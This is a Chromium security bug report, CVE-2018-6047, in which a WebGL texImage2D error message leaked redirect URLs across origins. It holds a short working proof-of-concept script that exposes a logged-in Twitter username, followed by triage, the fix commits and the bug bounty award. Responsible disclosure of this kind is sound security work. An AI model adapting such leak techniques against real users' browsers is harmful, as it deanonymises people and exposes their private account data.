New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 799847 link

Starred by 4 users

Issue metadata

Status: Fixed
Owner:
Last visit > 30 days ago
Closed: Jan 2018
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 1
Type: Bug-Security



Sign in to add a comment

Redirect URL leak via error message of WebGL texture

Reported by masatoki...@gmail.com, Jan 8 2018

Issue description

UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.2 Safari/537.36

Steps to reproduce the problem:
Chrome leaks a redirect URL to external origins via the error messge of WebGL texture.

1. Log in your twitter account. 
2. Go to https://vulnerabledoma.in/chrome_webgl_url_leak.html . This page has following HTML:

<canvas id="canvas"></canvas>
<script>
window.onerror=function(e){
    alert(e);
}
canvas = document.getElementById('canvas');
gl = canvas.getContext("webgl");
texture = gl.createTexture();
img = new Image();
img.onerror = function() { 
    gl.bindTexture(gl.TEXTURE_2D, texture);
    gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, gl.RGBA, gl.UNSIGNED_BYTE, img);
}
img.src = "//analytics.twitter.com/accounts";
</script>

3. You can see your username in the alert dialog:

Uncaught DOMException: Failed to execute 'texImage2D' on 'WebGLRenderingContext': The cross-origin image at https://analytics.twitter.com/i/insights/redirect/home?screen_name=[YOUR_TWITTER_ACCOUNT_HERE] may not be loaded.

What is the expected behavior?
The redirect URL should not be included in the error message.

What went wrong?
The redirect URL is included in the error message.

Did this work before? N/A 

Chrome version: 65.0.3314.2  Channel: stable
OS Version: 10.0
Flash Version:
 
Components: Blink>WebGL Blink>SecurityFeature>SameOriginPolicy
Labels: Security_Impact-Stable OS-Android OS-Chrome OS-Linux OS-Mac
Status: Untriaged (was: Unconfirmed)
Great bug, thanks!
Cc: bajones@google.com
If believe that if we want to expose the full string, we should do so by calling Document::AddConsoleMessage or equivalent directly.


I wonder whether WebGL is the only place this leak exists (e.g. maybe CSP has a similar bug)
RE #2: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/core/workers/WorkerGlobalScope.cpp?l=153&rcl=0aeffba21ac5213b205cfb98b6fc14581b153871 looks potentially suspect as well.

In contrast, we see explicit awareness of this threat in other codepaths, e.g.
https://cs.chromium.org/chromium/src/third_party/WebKit/Source/core/workers/AbstractWorker.cpp?l=58&rcl=0aeffba21ac5213b205cfb98b6fc14581b153871
  // We can safely expose the URL in the following exceptions, as these checks
  // happen synchronously before redirection. JavaScript receives no new
  // information.

Owner: elawrence@chromium.org
Status: Started (was: Untriaged)
Cc: kbr@chromium.org
Labels: Security_Severity-Medium FoundIn-63
Project Member

Comment 7 by bugdroid1@chromium.org, Jan 10 2018

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c

commit fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c
Author: Eric Lawrence <elawrence@chromium.org>
Date: Wed Jan 10 23:00:12 2018

Simplify WebGL error message

The WebGL exception message text contains the full URL of a blocked
cross-origin resource. It should instead contain only a generic notice.

Bug:  799847 
Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Change-Id: I3a7f00462a4643c41882f2ee7e7767e6d631557e
Reviewed-on: https://chromium-review.googlesource.com/854986
Reviewed-by: Brandon Jones <bajones@chromium.org>
Reviewed-by: Kenneth Russell <kbr@chromium.org>
Commit-Queue: Eric Lawrence <elawrence@chromium.org>
Cr-Commit-Position: refs/heads/master@{#528458}
[modify] https://crrev.com/fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c/third_party/WebKit/LayoutTests/http/tests/security/webgl-remote-read-remote-image-blocked-no-crossorigin-expected.txt
[modify] https://crrev.com/fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c/third_party/WebKit/Source/modules/webgl/WebGLRenderingContextBase.cpp

Project Member

Comment 8 by sheriffbot@chromium.org, Jan 11 2018

Labels: M-64
Project Member

Comment 9 by sheriffbot@chromium.org, Jan 11 2018

Labels: -Pri-2 Pri-1
Labels: Merge-Request-64
Status: Fixed (was: Started)
Project Member

Comment 11 by sheriffbot@chromium.org, Jan 11 2018

Labels: -Merge-Request-64 Hotlist-Merge-Review Merge-Review-64
This bug requires manual review: We are only 11 days from stable.
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 12 by cmasso@google.com, Jan 11 2018

Cc: awhalley@chromium.org
awhalley@ please take a look!
First thing Tuesday morning PDT, please check for any crashes/problem reports from Canary. If it looks good then we should merge.
Project Member

Comment 14 by sheriffbot@chromium.org, Jan 12 2018

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Cc: elawrence@chromium.org
Owner: cma...@chromium.org
cmasso: Do I need to wait for an additional "Merge-Approved", or is #13 sufficient? 
Cc: abdulsyed@chromium.org
abdulsyed@ will need to give the merge approval. (Thanks for checking)
Labels: reward-topanel
Labels: -Merge-Review-64 Merge-Approved-64
Thanks elawrence@ - approving merge for M64. Branch:3282
Project Member

Comment 19 by bugdroid1@chromium.org, Jan 16 2018

Labels: -merge-approved-64 merge-merged-3282
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/b18672fb63b271a7ebede1e213d83e1e5af129dc

commit b18672fb63b271a7ebede1e213d83e1e5af129dc
Author: Eric Lawrence <elawrence@chromium.org>
Date: Tue Jan 16 20:02:27 2018

Simplify WebGL error message

The WebGL exception message text contains the full URL of a blocked
cross-origin resource. It should instead contain only a generic notice.

Bug:  799847 
Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Change-Id: I3a7f00462a4643c41882f2ee7e7767e6d631557e
Reviewed-on: https://chromium-review.googlesource.com/854986
Reviewed-by: Brandon Jones <bajones@chromium.org>
Reviewed-by: Kenneth Russell <kbr@chromium.org>
Commit-Queue: Eric Lawrence <elawrence@chromium.org>
Cr-Original-Commit-Position: refs/heads/master@{#528458}(cherry picked from commit fae4d7b7d7e5c8a04a8b7a3258c0fc8362afa24c)
Reviewed-on: https://chromium-review.googlesource.com/868831
Reviewed-by: Eric Lawrence <elawrence@chromium.org>
Cr-Commit-Position: refs/branch-heads/3282@{#509}
Cr-Branched-From: 5fdc0fab22ce7efd32532ee989b223fa12f8171e-refs/heads/master@{#520840}
[modify] https://crrev.com/b18672fb63b271a7ebede1e213d83e1e5af129dc/third_party/WebKit/LayoutTests/http/tests/security/webgl-remote-read-remote-image-blocked-no-crossorigin-expected.txt
[modify] https://crrev.com/b18672fb63b271a7ebede1e213d83e1e5af129dc/third_party/WebKit/Source/modules/webgl/WebGLRenderingContextBase.cpp

I've verified the codepath in #3 does not leak the post-redirection URL. 
https://whytls.com/test/webworker.html

Labels: Release-0-M64
Labels: CVE-2018-6047
Labels: -reward-topanel reward-unpaid reward-2000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one! the VRP panel decided to award $2,000 for this one!
Labels: -reward-unpaid reward-inprocess
Project Member

Comment 26 by sheriffbot@chromium.org, Mar 27 2018

Labels: -M-64 M-65
Project Member

Comment 27 by sheriffbot@chromium.org, Apr 20 2018

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: CVE_description-missing
Labels: -CVE_description-missing CVE_description-submitted

Sign in to add a comment